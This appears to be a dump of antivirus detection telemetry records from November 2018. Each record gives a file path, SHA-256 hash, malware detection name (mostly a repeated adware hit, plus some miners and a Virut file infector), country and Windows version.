  Row(detection=Row(filename='avscan-20181104-150934-f597a590', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-150934-F597A590', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:09:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134422-21e0650b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-134422-21E0650B', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:44:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141612-8fd53a44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-141612-8FD53A44', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:16:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133815-db90996b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-133815-DB90996B', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:38:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140915-40073065', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-140915-40073065', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141434-7d29f3cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-141434-7D29F3CB', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:14:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134201-06cfeaff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-134201-06CFEAFF', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151207-12c7304f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-151207-12C7304F', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:12:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133225-98735793', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-133225-98735793', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:32:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140741-2df1f9bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-140741-2DF1F9BD', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:07:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150604-cd635048', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-150604-CD635048', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:06:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150645-d529640b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-150645-D529640B', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:06:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135949-d391ceaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-135949-D391CEAF', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:59:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140805-3287346d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-140805-3287346D', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:08:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135353-8f36e7ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-135353-8F36E7AD', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:53:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141012-4ae337af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-141012-4AE337AF', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:10:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140840-39368b1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-140840-39368B1B', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:08:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135925-cef58d92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-135925-CEF58D92', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:59:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150403-b62bbbb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-150403-B62BBBB1', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:04:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134945-5fb0df65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-134945-5FB0DF65', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:49:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135538-a3533bc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-135538-A3533BC1', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:55:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135810-c09497c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-135810-C09497C1', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:58:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-142415-ec6e4e30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-142415-EC6E4E30', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:24:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150345-b2997e48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-150345-B2997E48', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:03:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150354-b46150fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-150354-B46150FE', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:03:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133607-c30b6af3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-133607-C30B6AF3', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134511-2b42f9be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-134511-2B42F9BE', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:45:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151505-35127bb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-151505-35127BB1', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:15:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133859-e3e42ccc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-133859-E3E42CCC', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:39:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152340-97b1f36b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-152340-97B1F36B', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:23:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151040-0232d1ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-151040-0232D1ED', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:10:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151024-ff282d2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-151024-FF282D2A', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:10:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140304-f8e3bc44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-140304-F8E3BC44', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:03:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135144-768d5b8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-135144-768D5B8A', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:51:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133556-c0d67852', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-133556-C0D67852', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:35:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-142100-c7059077', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-142100-C7059077', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:21:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133545-bec2d4ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-133545-BEC2D4EF', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:35:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151623-43e207c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-151623-43E207C2', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:16:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151127-0b430c08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-151127-0B430C08', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:11:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140215-ef6e5032', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-140215-EF6E5032', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:02:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133049-860c22bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-133049-860C22BB', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:30:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140235-f33b63b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-140235-F33B63B4', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:02:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151104-06b69955', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-151104-06B69955', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:11:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140629-203ebda0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-140629-203EBDA0', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:06:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152043-75c9d794', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-152043-75C9D794', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:20:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150034-8dfe5f2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-150034-8DFE5F2F', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:00:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f_01df9e', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_01df9e', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='f67e5e25e496610e518f3c06663d347ad5ff0106198db5460f74ae0d713e2238', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-04T20:21:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f699d02090acce4fdbee30279a93642e5a51ca81a408abf8a6293e63ac13b5dc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F699D02090ACCE4FDBEE30279A93642E5A51CA81A408ABF8A6293E63AC13B5DC', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='f699d02090acce4fdbee30279a93642e5a51ca81a408abf8a6293e63ac13b5dc', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:51:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-audio-audiocore_31bf3856ad364e35_6.1.7601.17514_none_78a72e1242e1d8e5\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='f6a31d409e5528233f6c753294e1e9620058f1e944187aa21f6c6a62bc93bc85', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:08:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T14:16:47Z'), dt=datetime.date(2018, 11, 4)),
